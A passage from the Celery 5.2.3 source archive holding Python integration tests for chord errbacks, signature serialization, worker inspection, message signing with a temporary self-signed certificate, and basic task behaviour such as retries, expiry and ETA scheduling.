subtests.test( msg="Errback is called after simple header task fails" ): await_redis_echo({errback_msg, }, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from simple body task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after simple body task fails" ): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_simple( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback = errback_task.s() child_sig = fail.s() chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from simple header task"): res = chord_sig.delay() with 
pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after simple header task fails" ): await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from simple body task"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after simple body task fails" ): await_redis_count(1, redis_key=expected_redis_key) redis_connection.delete(expected_redis_key) def test_error_propagates_to_chord_from_chain(self, manager, subtests): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_sig = chain(identity.si(42), fail.s(), identity.si(42)) chord_sig = chord((child_sig, ), identity.s()) with subtests.test( msg="Error propagates from header chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) chord_sig = chord((identity.si(42), ), child_sig) with subtests.test( msg="Error propagates from body chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_immutable_errback_called_by_chord_from_chain( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) child_sig = chain(identity.si(42), fail.s(), identity.si(42)) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test( msg="Error propagates from header chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after header chain which fails before the end" ): await_redis_echo({errback_msg, }, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test( msg="Error propagates from body chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after body chain which fails before the end" ): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_chain( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback = errback_task.s() fail_sig = fail.s() fail_sig_id = fail_sig.freeze().id child_sig = chain(identity.si(42), fail_sig, identity.si(42)) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test( msg="Error propagates from header chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with 
subtests.test( msg="Errback is called after header chain which fails before the end" ): await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) expected_redis_key = fail_sig_id redis_connection.delete(expected_redis_key) with subtests.test( msg="Error propagates from body chain which fails before the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after body chain which fails before the end" ): await_redis_count(1, redis_key=expected_redis_key) redis_connection.delete(expected_redis_key) def test_error_propagates_to_chord_from_chain_tail(self, manager, subtests): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_sig = chain(identity.si(42), fail.s()) chord_sig = chord((child_sig, ), identity.s()) with subtests.test( msg="Error propagates from header chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) chord_sig = chord((identity.si(42), ), child_sig) with subtests.test( msg="Error propagates from body chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_immutable_errback_called_by_chord_from_chain_tail( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) child_sig = chain(identity.si(42), fail.s()) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test( msg="Error propagates from header chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after header chain which fails at the end" ): await_redis_echo({errback_msg, }, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test( msg="Error propagates from body chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after body chain which fails at the end" ): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_chain_tail( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback = errback_task.s() fail_sig = fail.s() fail_sig_id = fail_sig.freeze().id child_sig = chain(identity.si(42), fail_sig) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test( msg="Error propagates from header chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after header chain which fails at the end" ): 
await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) expected_redis_key = fail_sig_id redis_connection.delete(expected_redis_key) with subtests.test( msg="Error propagates from header chain which fails at the end" ): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test( msg="Errback is called after header chain which fails at the end" ): await_redis_count(1, redis_key=expected_redis_key) redis_connection.delete(expected_redis_key) def test_error_propagates_to_chord_from_group(self, manager, subtests): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_sig = group(identity.si(42), fail.s()) chord_sig = chord((child_sig, ), identity.s()) with subtests.test(msg="Error propagates from header group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) chord_sig = chord((identity.si(42), ), child_sig) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) def test_immutable_errback_called_by_chord_from_group( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) child_sig = group(identity.si(42), fail.s()) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from header group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after header group fails"): await_redis_echo({errback_msg, }, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after body group fails"): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_group( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback = errback_task.s() fail_sig = fail.s() fail_sig_id = fail_sig.freeze().id child_sig = group(identity.si(42), fail_sig) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from header group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after header group fails"): await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) expected_redis_key = fail_sig_id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with 
pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after body group fails"): await_redis_count(1, redis_key=expected_redis_key) redis_connection.delete(expected_redis_key) def test_immutable_errback_called_by_chord_from_group_fail_multiple( self, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() fail_task_count = 42 redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) # Include a mix of passing and failing tasks child_sig = group( *(identity.si(42) for _ in range(24)), # arbitrary task count *(fail.s() for _ in range(fail_task_count)), ) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from header group"): redis_connection.delete(redis_key) res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after header group fails"): # NOTE: Here we only expect the errback to be called once since it # is attached to the chord body which is a single task! await_redis_count(1, redis_key=redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after body group fails"): # NOTE: Here we expect the errback to be called once per failing # task in the chord body since it is a group await_redis_count(fail_task_count, redis_key=redis_key) redis_connection.delete(redis_key) @pytest.mark.parametrize( "errback_task", [errback_old_style, errback_new_style, ], ) def test_mutable_errback_called_by_chord_from_group_fail_multiple( self, errback_task, manager, subtests ): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() fail_task_count = 42 # We have to use failing task signatures with unique task IDs to ensure # the chord can complete when they are used as part of its header! fail_sigs = tuple( fail.s() for _ in range(fail_task_count) ) fail_sig_ids = tuple(s.freeze().id for s in fail_sigs) errback = errback_task.s() # Include a mix of passing and failing tasks child_sig = group( *(identity.si(42) for _ in range(24)), # arbitrary task count *fail_sigs, ) chord_sig = chord((child_sig, ), identity.s()) chord_sig.link_error(errback) expected_redis_key = chord_sig.body.freeze().id redis_connection.delete(expected_redis_key) with subtests.test(msg="Error propagates from header group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after header group fails"): # NOTE: Here we only expect the errback to be called once since it # is attached to the chord body which is a single task! 
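            # For reference, a minimal sketch of the wiring these chord
            # errback tests exercise (task names here are illustrative, not
            # part of this suite):
            #
            #     sig = chord(group(ok.s(), failing.s()), collect.s())
            #     sig.link_error(on_error.s())
            #     sig.delay()
            #
            # The errback linked this way lands on the chord body, a single
            # task, so a header failure fires it once; when the *body* is a
            # group, each failing child fires its own errback, which is what
            # the subtests above and below assert.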
await_redis_count(1, redis_key=expected_redis_key) chord_sig = chord((identity.si(42), ), child_sig) chord_sig.link_error(errback) for fail_sig_id in fail_sig_ids: redis_connection.delete(fail_sig_id) with subtests.test(msg="Error propagates from body group"): res = chord_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after body group fails"): # NOTE: Here we expect the errback to be called once per failing # task in the chord body since it is a group, and each task has a # unique task ID for i, fail_sig_id in enumerate(fail_sig_ids): await_redis_count( 1, redis_key=fail_sig_id, # After the first one is seen, check the rest with no # timeout since waiting to confirm that each one doesn't # get over-incremented will take a long time timeout=TIMEOUT if i == 0 else 0, ) for fail_sig_id in fail_sig_ids: redis_connection.delete(fail_sig_id) def test_chord_header_task_replaced_with_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( replace_with_chain.si(42), identity.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42] def test_chord_header_child_replaced_with_chain_first(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( (replace_with_chain.si(42), identity.s(1337), ), identity.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337] def test_chord_header_child_replaced_with_chain_middle(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( (identity.s(42), replace_with_chain.s(1337), identity.s(31337), ), identity.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337, 31337] def test_chord_header_child_replaced_with_chain_last(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( (identity.s(42), replace_with_chain.s(1337), ), identity.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337] def test_chord_body_task_replaced_with_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( identity.s(42), replace_with_chain.s(), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42] def test_chord_body_chain_child_replaced_with_chain_first(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( identity.s(42), chain(replace_with_chain.s(), identity.s(), ), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42] def test_chord_body_chain_child_replaced_with_chain_middle(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( identity.s(42), chain(identity.s(), replace_with_chain.s(), identity.s(), ), ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42] def test_chord_body_chain_child_replaced_with_chain_last(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) orig_sig = chord( identity.s(42), chain(identity.s(), replace_with_chain.s(), ), ) res_obj = 
orig_sig.delay()
        assert res_obj.get(timeout=TIMEOUT) == [42]


class test_signature_serialization:
    """
    Confirm nested signatures can be rebuilt after passing through a backend.

    These tests are expected to finish and return `None` or raise an
    exception in the error case. The exception indicates that some element of
    a nested signature object was not properly deserialized from its
    dictionary representation, and would explode later on if it were used as
    a signature.
    """

    def test_rebuild_nested_chain_chain(self, manager):
        sig = chain(
            tasks.return_nested_signature_chain_chain.s(),
            tasks.rebuild_signature.s()
        )
        sig.delay().get(timeout=TIMEOUT)

    def test_rebuild_nested_chain_group(self, manager):
        sig = chain(
            tasks.return_nested_signature_chain_group.s(),
            tasks.rebuild_signature.s()
        )
        sig.delay().get(timeout=TIMEOUT)

    def test_rebuild_nested_chain_chord(self, manager):
        try:
            manager.app.backend.ensure_chords_allowed()
        except NotImplementedError as e:
            raise pytest.skip(e.args[0])

        sig = chain(
            tasks.return_nested_signature_chain_chord.s(),
            tasks.rebuild_signature.s()
        )
        sig.delay().get(timeout=TIMEOUT)

    def test_rebuild_nested_group_chain(self, manager):
        sig = chain(
            tasks.return_nested_signature_group_chain.s(),
            tasks.rebuild_signature.s()
        )
        sig.delay().get(timeout=TIMEOUT)

    def test_rebuild_nested_group_group(self, manager):
        sig = chain(
            tasks.return_nested_signature_group_group.s(),
            tasks.rebuild_signature.s()
        )
        sig.delay().get(timeout=TIMEOUT)

    def test_rebuild_nested_group_chord(self, manager):
        try:
            manager.app.backend.ensure_chords_allowed()
        except NotImplementedError as e:
            raise pytest.skip(e.args[0])

        sig = chain(
            tasks.return_nested_signature_group_chord.s(),
            tasks.rebuild_signature.s()
        )
        sig.delay().get(timeout=TIMEOUT)

    def test_rebuild_nested_chord_chain(self, manager):
        try:
            manager.app.backend.ensure_chords_allowed()
        except NotImplementedError as e:
            raise pytest.skip(e.args[0])

        sig = chain(
            tasks.return_nested_signature_chord_chain.s(),
            tasks.rebuild_signature.s()
        )
        sig.delay().get(timeout=TIMEOUT)

    def test_rebuild_nested_chord_group(self, manager):
        try:
            manager.app.backend.ensure_chords_allowed()
        except NotImplementedError as e:
            raise pytest.skip(e.args[0])

        sig = chain(
            tasks.return_nested_signature_chord_group.s(),
            tasks.rebuild_signature.s()
        )
        sig.delay().get(timeout=TIMEOUT)

    def test_rebuild_nested_chord_chord(self, manager):
        try:
            manager.app.backend.ensure_chords_allowed()
        except NotImplementedError as e:
            raise pytest.skip(e.args[0])

        sig = chain(
            tasks.return_nested_signature_chord_chord.s(),
            tasks.rebuild_signature.s()
        )
        sig.delay().get(timeout=TIMEOUT)


celery-5.2.3/t/integration/test_inspect.py

import os
import re
from datetime import datetime, timedelta
from time import sleep
from unittest.mock import ANY

import pytest

from celery.utils.nodenames import anon_nodename

from .tasks import add, sleeping

NODENAME = anon_nodename()

_flaky = pytest.mark.flaky(reruns=5, reruns_delay=2)
_timeout = pytest.mark.timeout(timeout=300)


def flaky(fn):
    return _timeout(_flaky(fn))


@pytest.fixture()
def inspect(manager):
    return manager.app.control.inspect()


class test_Inspect:
    """Integration tests for the app.control.inspect() API"""

    @flaky
    def test_ping(self, inspect):
        """Tests pinging the worker"""
        ret = inspect.ping()
        assert len(ret) == 1
        assert ret[NODENAME] == {'ok': 'pong'}
        # TODO: Check ping() is returning None after
stopping worker. # This is tricky since current test suite does not support stopping of # the worker. @flaky def test_clock(self, inspect): """Tests getting clock information from worker""" ret = inspect.clock() assert len(ret) == 1 assert ret[NODENAME]['clock'] > 0 @flaky def test_registered(self, inspect): """Tests listing registered tasks""" # TODO: We can check also the exact values of the registered methods ret = inspect.registered() assert len(ret) == 1 len(ret[NODENAME]) > 0 for task_name in ret[NODENAME]: assert isinstance(task_name, str) ret = inspect.registered('name') for task_info in ret[NODENAME]: # task_info is in form 'TASK_NAME [name=TASK_NAME]' assert re.fullmatch(r'\S+ \[name=\S+\]', task_info) @flaky def test_active_queues(self, inspect): """Tests listing active queues""" ret = inspect.active_queues() assert len(ret) == 1 assert ret[NODENAME] == [ { 'alias': None, 'auto_delete': False, 'binding_arguments': None, 'bindings': [], 'consumer_arguments': None, 'durable': True, 'exchange': { 'arguments': None, 'auto_delete': False, 'delivery_mode': None, 'durable': True, 'name': 'celery', 'no_declare': False, 'passive': False, 'type': 'direct' }, 'exclusive': False, 'expires': None, 'max_length': None, 'max_length_bytes': None, 'max_priority': None, 'message_ttl': None, 'name': 'celery', 'no_ack': False, 'no_declare': None, 'queue_arguments': None, 'routing_key': 'celery'} ] @flaky def test_active(self, inspect): """Tests listing active tasks""" res = sleeping.delay(5) sleep(1) ret = inspect.active() assert len(ret) == 1 assert ret[NODENAME] == [ { 'id': res.task_id, 'name': 't.integration.tasks.sleeping', 'args': [5], 'kwargs': {}, 'type': 't.integration.tasks.sleeping', 'hostname': ANY, 'time_start': ANY, 'acknowledged': True, 'delivery_info': { 'exchange': '', 'routing_key': 'celery', 'priority': 0, 'redelivered': False }, 'worker_pid': ANY } ] @flaky def test_scheduled(self, inspect): """Tests listing scheduled tasks""" exec_time = datetime.utcnow() + timedelta(seconds=5) res = add.apply_async([1, 2], {'z': 3}, eta=exec_time) ret = inspect.scheduled() assert len(ret) == 1 assert ret[NODENAME] == [ { 'eta': exec_time.strftime('%Y-%m-%dT%H:%M:%S.%f') + '+00:00', 'priority': 6, 'request': { 'id': res.task_id, 'name': 't.integration.tasks.add', 'args': [1, 2], 'kwargs': {'z': 3}, 'type': 't.integration.tasks.add', 'hostname': ANY, 'time_start': None, 'acknowledged': False, 'delivery_info': { 'exchange': '', 'routing_key': 'celery', 'priority': 0, 'redelivered': False }, 'worker_pid': None } } ] @flaky def test_query_task(self, inspect): """Task that does not exist or is finished""" ret = inspect.query_task('d08b257e-a7f1-4b92-9fea-be911441cb2a') assert len(ret) == 1 assert ret[NODENAME] == {} # Task in progress res = sleeping.delay(5) sleep(1) ret = inspect.query_task(res.task_id) assert len(ret) == 1 assert ret[NODENAME] == { res.task_id: [ 'active', { 'id': res.task_id, 'name': 't.integration.tasks.sleeping', 'args': [5], 'kwargs': {}, 'type': 't.integration.tasks.sleeping', 'hostname': NODENAME, 'time_start': ANY, 'acknowledged': True, 'delivery_info': { 'exchange': '', 'routing_key': 'celery', 'priority': 0, 'redelivered': False }, # worker is running in the same process as separate thread 'worker_pid': ANY } ] } @flaky def test_stats(self, inspect): """tests fetching statistics""" ret = inspect.stats() assert len(ret) == 1 assert ret[NODENAME]['pool']['max-concurrency'] == 1 assert len(ret[NODENAME]['pool']['processes']) == 1 assert ret[NODENAME]['uptime'] > 0 # worker is 
running in the same process as separate thread assert ret[NODENAME]['pid'] == os.getpid() @flaky def test_report(self, inspect): """Tests fetching report""" ret = inspect.report() assert len(ret) == 1 assert ret[NODENAME] == {'ok': ANY} @flaky def test_revoked(self, inspect): """Testing revoking of task""" # Fill the queue with tasks to fill the queue for _ in range(4): sleeping.delay(2) # Execute task and revoke it result = add.apply_async((1, 1)) result.revoke() ret = inspect.revoked() assert len(ret) == 1 assert result.task_id in ret[NODENAME] @flaky def test_conf(self, inspect): """Tests getting configuration""" ret = inspect.conf() assert len(ret) == 1 assert ret[NODENAME]['worker_hijack_root_logger'] == ANY assert ret[NODENAME]['worker_log_color'] == ANY assert ret[NODENAME]['accept_content'] == ANY assert ret[NODENAME]['enable_utc'] == ANY assert ret[NODENAME]['timezone'] == ANY assert ret[NODENAME]['broker_url'] == ANY assert ret[NODENAME]['result_backend'] == ANY assert ret[NODENAME]['broker_heartbeat'] == ANY assert ret[NODENAME]['deprecated_settings'] == ANY assert ret[NODENAME]['include'] == ANY ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/test_security.py0000664000175000017500000000660300000000000020750 0ustar00asifasif00000000000000import datetime import os import tempfile import pytest from cryptography import x509 from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.x509.oid import NameOID from .tasks import add class test_security: @pytest.fixture(autouse=True, scope='class') def class_certs(self, request): self.tmpdir = tempfile.mkdtemp() self.key_name = 'worker.key' self.cert_name = 'worker.pem' key = self.gen_private_key() cert = self.gen_certificate(key=key, common_name='celery cecurity integration') pem_key = key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption() ) pem_cert = cert.public_bytes( encoding=serialization.Encoding.PEM, ) with open(self.tmpdir + '/' + self.key_name, 'wb') as key: key.write(pem_key) with open(self.tmpdir + '/' + self.cert_name, 'wb') as cert: cert.write(pem_cert) request.cls.tmpdir = self.tmpdir request.cls.key_name = self.key_name request.cls.cert_name = self.cert_name yield os.remove(self.tmpdir + '/' + self.key_name) os.remove(self.tmpdir + '/' + self.cert_name) os.rmdir(self.tmpdir) @pytest.fixture(autouse=True) def _prepare_setup(self, manager): manager.app.conf.update( security_key=f'{self.tmpdir}/{self.key_name}', security_certificate=f'{self.tmpdir}/{self.cert_name}', security_cert_store=f'{self.tmpdir}/*.pem', task_serializer='auth', event_serializer='auth', accept_content=['auth'], result_accept_content=['json'] ) manager.app.setup_security() def gen_private_key(self): """generate a private key with cryptography""" return rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend(), ) def gen_certificate(self, key, common_name, issuer=None, sign_key=None): """generate a certificate with cryptography""" now = datetime.datetime.utcnow() certificate = x509.CertificateBuilder().subject_name( x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, common_name), ]) ).issuer_name( x509.Name([ x509.NameAttribute( NameOID.COMMON_NAME, issuer or common_name ) ]) ).not_valid_before( 
now ).not_valid_after( now + datetime.timedelta(seconds=86400) ).serial_number( x509.random_serial_number() ).public_key( key.public_key() ).add_extension( x509.BasicConstraints(ca=True, path_length=0), critical=True ).sign( private_key=sign_key or key, algorithm=hashes.SHA256(), backend=default_backend() ) return certificate @pytest.mark.xfail(reason="Issue #5269") def test_security_task_done(self): t1 = add.delay(1, 1) assert t1.get() == 2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/integration/test_tasks.py0000664000175000017500000002403200000000000020222 0ustar00asifasif00000000000000from datetime import datetime, timedelta from time import perf_counter, sleep import pytest import celery from celery import group from .conftest import get_active_redis_channels from .tasks import (ClassBasedAutoRetryTask, ExpectedException, add, add_ignore_result, add_not_typed, fail, print_unicode, retry, retry_once, retry_once_priority, return_properties, sleeping) TIMEOUT = 10 _flaky = pytest.mark.flaky(reruns=5, reruns_delay=2) _timeout = pytest.mark.timeout(timeout=300) def flaky(fn): return _timeout(_flaky(fn)) class test_class_based_tasks: @flaky def test_class_based_task_retried(self, celery_session_app, celery_session_worker): task = ClassBasedAutoRetryTask() celery_session_app.tasks.register(task) res = task.delay() assert res.get(timeout=TIMEOUT) == 1 def _producer(j): """Single producer helper function""" results = [] for i in range(20): results.append([i + j, add.delay(i, j)]) for expected, result in results: value = result.get(timeout=10) assert value == expected assert result.status == 'SUCCESS' assert result.ready() is True assert result.successful() is True return j class test_tasks: def test_simple_call(self): """Tests direct simple call of task""" assert add(1, 1) == 2 assert add(1, 1, z=1) == 3 @flaky def test_basic_task(self, manager): """Tests basic task call""" results = [] # Tests calling task only with args for i in range(10): results.append([i + i, add.delay(i, i)]) for expected, result in results: value = result.get(timeout=10) assert value == expected assert result.status == 'SUCCESS' assert result.ready() is True assert result.successful() is True results = [] # Tests calling task with args and kwargs for i in range(10): results.append([3*i, add.delay(i, i, z=i)]) for expected, result in results: value = result.get(timeout=10) assert value == expected assert result.status == 'SUCCESS' assert result.ready() is True assert result.successful() is True @flaky def test_multiprocess_producer(self, manager): """Testing multiple processes calling tasks.""" from multiprocessing import Pool pool = Pool(20) ret = pool.map(_producer, range(120)) assert list(ret) == list(range(120)) @flaky def test_multithread_producer(self, manager): """Testing multiple threads calling tasks.""" from multiprocessing.pool import ThreadPool pool = ThreadPool(20) ret = pool.map(_producer, range(120)) assert list(ret) == list(range(120)) @flaky def test_ignore_result(self, manager): """Testing calling task with ignoring results.""" result = add.apply_async((1, 2), ignore_result=True) assert result.get() is None # We wait since it takes a bit of time for the result to be # persisted in the result backend. 
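        # With ignore_result=True nothing is ever written to the backend, so
        # result.result stays None even after the task has run; illustrative
        # sketch of the behaviour under test:
        #
        #     r = add.apply_async((1, 2), ignore_result=True)
        #     r.get()      # -> None
        #     r.result     # -> None, even once the worker has finished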
sleep(1) assert result.result is None @flaky def test_timeout(self, manager): """Testing timeout of getting results from tasks.""" result = sleeping.delay(10) with pytest.raises(celery.exceptions.TimeoutError): result.get(timeout=5) @flaky def test_expired(self, manager): """Testing expiration of task.""" # Fill the queue with tasks which took > 1 sec to process for _ in range(4): sleeping.delay(2) # Execute task with expiration = 1 sec result = add.apply_async((1, 1), expires=1) with pytest.raises(celery.exceptions.TaskRevokedError): result.get() assert result.status == 'REVOKED' assert result.ready() is True assert result.failed() is False assert result.successful() is False # Fill the queue with tasks which took > 1 sec to process for _ in range(4): sleeping.delay(2) # Execute task with expiration at now + 1 sec result = add.apply_async((1, 1), expires=datetime.utcnow() + timedelta(seconds=1)) with pytest.raises(celery.exceptions.TaskRevokedError): result.get() assert result.status == 'REVOKED' assert result.ready() is True assert result.failed() is False assert result.successful() is False @flaky def test_eta(self, manager): """Tests tasks scheduled at some point in future.""" start = perf_counter() # Schedule task to be executed in 3 seconds result = add.apply_async((1, 1), countdown=3) sleep(1) assert result.status == 'PENDING' assert result.ready() is False assert result.get() == 2 end = perf_counter() assert result.status == 'SUCCESS' assert result.ready() is True # Difference between calling the task and result must be bigger than 3 secs assert (end - start) > 3 start = perf_counter() # Schedule task to be executed at time now + 3 seconds result = add.apply_async((2, 2), eta=datetime.utcnow() + timedelta(seconds=3)) sleep(1) assert result.status == 'PENDING' assert result.ready() is False assert result.get() == 4 end = perf_counter() assert result.status == 'SUCCESS' assert result.ready() is True # Difference between calling the task and result must be bigger than 3 secs assert (end - start) > 3 @flaky def test_fail(self, manager): """Tests that the failing task propagates back correct exception.""" result = fail.delay() with pytest.raises(ExpectedException): result.get(timeout=5) assert result.status == 'FAILURE' assert result.ready() is True assert 